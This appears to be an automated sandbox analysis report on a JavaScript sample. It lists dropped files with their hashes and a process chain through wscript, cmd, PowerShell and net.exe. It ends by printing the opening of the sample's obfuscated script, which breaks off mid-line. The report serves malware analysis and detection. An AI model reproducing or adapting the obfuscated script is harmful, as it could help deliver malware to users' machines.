SHA-512: | 349303CBDFD4D36831210B4B6FF78D6F8C81BBD9129D83652FD48221DBC441D9C0364E582D3521C5BD401F542FFEA096EDC8C032C0F4524E6AF56D01F70F978F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.314176637061706 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJf21rPeUkwRe9:YvXKXIoJImGRsdTeOPG+16Ukee9 |
MD5: | 5E83D4FB415DEB328F88D2C4574802A8 |
SHA1: | 2F7B14C4DB4249FDDCE667B816ADEC43EB7EB810 |
SHA-256: | A332FCB2AA52E9B2DB595362701E0B1064901A2EB3DC3791BD531C833E878130 |
SHA-512: | 04E0C64C1263DA1629DCA878661C0C658AE7410C500F90CE4C9F322CBBA76202561517120FA8CD25A8E7FAD89B988B23C6200F6EF983E18AC7B4BB1A3DCBA7A5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.669472489153074 |
Encrypted: | false |
SSDEEP: | 24:Yv6X8mqmeOQamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSd:Yvk5evBgkDMUJUAh8cvMd |
MD5: | D5D01F90F33295BDC58E2CDC83929D6D |
SHA1: | 481F4D284FC5FA8BCE3D27DEEF7D6F1C7C488F3F |
SHA-256: | 379F320D911563A951DEF0989577E8E4EA617B2D58E3E572782F6730546708BE |
SHA-512: | 8F07D530F1448C1ACC2262234E3DEB0266BF216265780E8BA889228CAF1576B58782C4A4237C640E82A5FAD5B46AA879644D99EACF14F8D4583359E95C3128B7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2892964355874 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJfshHHrPeUkwRe9:YvXKXIoJImGRsdTeOPGUUUkee9 |
MD5: | 4E29E7D6E8B48E764973882F8DAF7091 |
SHA1: | B5B774CC762A9766AAED69ED4C02799AB90EF3C4 |
SHA-256: | 1E53CE7C14BCE8837FA95DDA309F227806461519A6A0033937851230683FFD7F |
SHA-512: | D7D7E96D885F2D0BC06D602CE1722305ABC4FB2E496A757F12B27011E0585F3929F58CB7E932F0F08CB27CB742C7CC8B2C8654F71DA27FB39B116C475803E992 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.304424302190302 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHEBoJISVGJYWsGiIPEeOF0YZZgoAvJTqgFCrPeUkwRe9:YvXKXIoJImGRsdTeOPGTq16Ukee9 |
MD5: | 64576EE96B1F7766BC806F33A6C845DD |
SHA1: | A0209913F2E04630AB237B65D0F68EE4437D6F36 |
SHA-256: | 7CD7B90620FDDE3E217F39D0439D14811E1F0145E100FA4672583E6EB36852A6 |
SHA-512: | E227B3B4B18DD7E58B9F6EEB2462305B6BCE5C891EE0EC91C35E26DF39CFAC000C4BEAF10233074E1654319688F7686F772D0AF56010C454BADAD0113D91E452 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.139764172702512 |
Encrypted: | false |
SSDEEP: | 24:YMV+EwaTaymc5Fl+edf3BWg5g0jGTj0Ss/h82w7Z2LSeCDEZ8f5zx3xX54x9/u4Z:YfVAdf5RGftBlwJ8fdx9qx9v |
MD5: | 442BC461DF71F314FB1A3C1EFABCC4C6 |
SHA1: | 248D3198A707427B8009E8198134F6AEB5CB4F0A |
SHA-256: | 8E7039B87B7FCCFE91BB4E0BBC4A961390E4D4A1EAC9A3B630FE22F09C116969 |
SHA-512: | B9D87E3FD7E9FD3148C327C9ED29EBDFD3646736BA615946AAB62BBD25ADD9908D4A9F7C7D65A3409262866CC940B5319B04E6E8724B74E4ECE6D82F036A8216 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.455169935568881 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsOlm:lNVmsw3SHtbDbPe0K3+fDZd0 |
MD5: | 239DB7E016214E28A147E9C52FDFCD62 |
SHA1: | BACFD25EF4CBEF21B6A44E3F1C0DFE843EF18271 |
SHA-256: | 5EB6240BBDB7034D87C3CCEA47F3781C2D2A73F4E30ED7BFD9BFD8371E1795A6 |
SHA-512: | 810309909417FD445C4F88BB44B89C081BBAB449D3C1550F0781C122443E5097BCC50D6E05900E2F5B91CD41DAF62CCFFA14870253B51C0780A7507F5D5DFD85 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.9574767813513845 |
Encrypted: | false |
SSDEEP: | 48:7MorvrBd6dHtbGIbPe0K3+fDy2ds/5qFl2GL7ms6:753SHtbDbPe0K3+fDZdAKVms6 |
MD5: | 74EC1C5B42F8FC17828078CC20925FC9 |
SHA1: | 8E7FEDAD897CECE13D345A56CB07AFBB8597940B |
SHA-256: | 2DE2EE26C6B45F779611660E645B488DC48265A8DCF247C2CEC72F0DFDA7E461 |
SHA-512: | 5803F270D756E71E6DC188855EE69F1B15337130DE7322CDADFE4B6DC89B5620925FDFF4188F30B2C5908C58E9F532A25737CB9DCAA473B6DFFAFF1CAE9FDD1E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgLtvSe5ksUQIAYnn6IZ6rAqmeTYyu:6a6TZ44ADEZKeVYn6eHFeTK |
MD5: | 93F62E68EEEC7D62DCECC8AAE87AD0B7 |
SHA1: | E29C684074AD834771B88BCE3D709F71B610A82D |
SHA-256: | C1D1B1D7D460EC5A0166634498DEFF47ED4CBCC8CDA46813B5A8D3BE53422966 |
SHA-512: | A3683CEF715564478465F07EE0A31A5882F850F721AE0B853F0FAD60C337D1E723E1FC96326923F5DEE3817D8A975F2B0871E5B3D84D9675E47D74732C4ED346 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulxmH/lZ:NllUg |
MD5: | D904BDD752B6F23D81E93ECA3BD8E0F3 |
SHA1: | 026D8B0D0F79861746760B0431AD46BAD2A01676 |
SHA-256: | B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2 |
SHA-512: | 5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.480679440204275 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88Clqlf9:Qw946cPbiOxDlbYnuRKd9 |
MD5: | 9BB3CD31FAF6AC82809BDD0D723ADD51 |
SHA1: | 807C2D7E9686232AC6F290EE00A7B9ED9605AC2C |
SHA-256: | A0CA3E3C8AB5840A117D4A9C6952CE38807B210BFBC6E20D257D3B28B8322CA0 |
SHA-512: | 2748F759243E32933BC154E1C4642BD49EA88EBD67AA7AC45B196DB29F114028549D2EF7B99F4337AE54271ED919945523F9177ED44032EDDA58D88C056B432C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 00-19-59-743.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.386483451061953 |
Encrypted: | false |
SSDEEP: | 384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID |
MD5: | F49CA270724D610D1589E217EA78D6D1 |
SHA1: | 22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3 |
SHA-256: | D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D |
SHA-512: | 181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.331289095933771 |
Encrypted: | false |
SSDEEP: | 384:q7Xy2mfIZbQItG8s6UCVQWvVsVcVJVlggAUzfIGsaWcWoep7Z4Iv1QcrlMloApr6:aX3i6Dw |
MD5: | ECE2F15CDD29CFC7B776B6B7817BD408 |
SHA1: | 536FB36D1101C82FFE065629B6DD2F32264967CA |
SHA-256: | 868349F0D5CA0AF10027694F0E89C567AF20B5CD29A7B95B4A24DBE334591697 |
SHA-512: | CB40198C08A79D424A15C2A40E9FADA4D04AC91FFD229D762874C9CF1EC21CD18A4C31D429303AEC94B6E5486F2D662BCDC235B578EBE5F4EF6C9DC81DB16811 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35721 |
Entropy (8bit): | 5.412067449102394 |
Encrypted: | false |
SSDEEP: | 768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRVK:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gR6 |
MD5: | 9A5ECE0887B551F55F669A86BB15EEE4 |
SHA1: | 1831C57BBDFF92705660CAA6BAACC9E7783B5D95 |
SHA-256: | 9FBF890A3EED3401AF7C4AD42E0C66E3FD5F9BB7464DEA31B2963E2F190F451D |
SHA-512: | B5E37F23A5CB5B16C7CE500122D738A5CCEB852808E7B6463C37047AAE78B5E28056FBD9486E65B643D095BDECFB4BA1C19BA445B1B0A05DFF3A4745E7B71662 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/VRbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZnYIGNPJF:tRb3mlind9i4ufFXpAXkrfUs0qWLxXGY |
MD5: | 9543A6C1DE815E938F6AA0F90F2EF0C6 |
SHA1: | 62B527E0463D71548862DE000950E638F3721582 |
SHA-256: | 8A4B4F588D79D2AF9E617936932D8264DF9017D80A68F8D39E5EA36B14D76F1D |
SHA-512: | 50A26B895BA1F40B2ADE59996A1A89EBAFE67CB9F7B4F3A029382B6966E75F8BAD3551D25F29391C58A7EDC206F7DAF1D07F68F5E458E3A5D02556EACA377B0D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/M7oMOWLaGZ4ZwYIGNP8dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RVWLaGZ4ZwZGm3mlind9i4ufFXpAXkru |
MD5: | E787F9888A1628BE8234F19E8EE26D68 |
SHA1: | 44D5180C06ADBBDAADDBCE350CE4DEC997CD83E5 |
SHA-256: | 3A09F3799148DA49F039A35AEDD22F368FB35B8D6022C4691C10606F704DAF80 |
SHA-512: | EE9B602898706CC0F33AA570E29A79A58ED748E1B738D74DF0C8C8DF193E23421B47AC8C862623ED774289D94FA90662A4CC436B80479D6420433D81752E9CA9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.918103374036562 |
TrID: | |
File name: | 2272523722022218526.js |
File size: | 20'301 bytes |
MD5: | 847be9017f4bed6ca5a506fd9fd9e300 |
SHA1: | 21da425147ca69cac1e1ff843e22cc358fe03e1e |
SHA256: | a20086aad74b5d3cb8c4729ef3df9db87ed896a841bfea5f326dca1d4fe5f1e5 |
SHA512: | 0091670a9ee04ee688a870c9a47e9b91cf031dfa03caafcae01a75df41a060e94da4ff5004b94c9bfff75a0dad6dded14cfd8b35e7052fc128d309b026bb17c3 |
SSDEEP: | 384:cp2v9FgrRUC2DbSBnj8sbgnRi6xyKg/thS5xPnn8Aks7G4S4FdShgEDBm65lDfcr:CTrRUC2DbSBnj8sbgnRi6xyKg/thS5xn |
TLSH: | E19241EDCD610F2C49D17EB5722115D86608460CC9E396A2AF103511EBE8F598BDBEFC |
File Content Preview: | function hhhtam(){qhzjkzd=[1031,3079,5127,4103,2055,3072];var ashdydo=this[ktgpqdz+bvwwh+gzgek+bwbzhcvfw+tlaycuwmg+cfqskvlj+jhtfyn+znfaypwcz](this[ilukledq+tifmgysgb+jtvviz+gzgek+abxxldmaz+ktgpqdz+znfaypwcz][tuisssgb+gzgek+tlaycuwmg+bvwwh+znfaypwcz+tlaycu |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 00:19:51 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff607960000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 00:19:51 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff65ba10000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 00:19:51 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 00:19:51 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 00:19:56 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702560000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 7 |
Start time: | 00:19:56 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff65ba10000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 00:19:56 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7506d0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 00:19:57 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 00:19:57 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 11 |
Start time: | 00:19:57 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function hhhtam() { |
|
1 | qhzjkzd = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var ashdydo = this[ktgpqdz + bvwwh + gzgek + bwbzhcvfw + tlaycuwmg + cfqskvlj + jhtfyn + znfaypwcz] ( this[ilukledq + tifmgysgb + jtvviz + gzgek + abxxldmaz + ktgpqdz + znfaypwcz][tuisssgb + gzgek + tlaycuwmg + bvwwh + znfaypwcz + tlaycuwmg + tsvgtsa + bzvwhcb + peemmc + tlaycuwmg + jtvviz + znfaypwcz] ( ilukledq + tifmgysgb + jtvviz + gzgek + abxxldmaz + ktgpqdz + znfaypwcz + xjmnfbmb + tifmgysgb + ylfvkvkhr + tlaycuwmg + izqvxtaa + izqvxtaa ) [pjybzdo + tlaycuwmg + amyhx + pjybzdo + tlaycuwmg + bvwwh + shwlqequ] ( jfdunreo + bkaev + goijnk + qmnebka + xlcsnv + tuisssgb + lizulmnc + pjybzdo + pjybzdo + goijnk + dohht + minial + xlcsnv + lizulmnc + tifmgysgb + goijnk + pjybzdo + bcldge + tuisssgb + ewwbvykp + jhtfyn + znfaypwcz + gzgek + ewwbvykp + izqvxtaa + xuvhkoj + 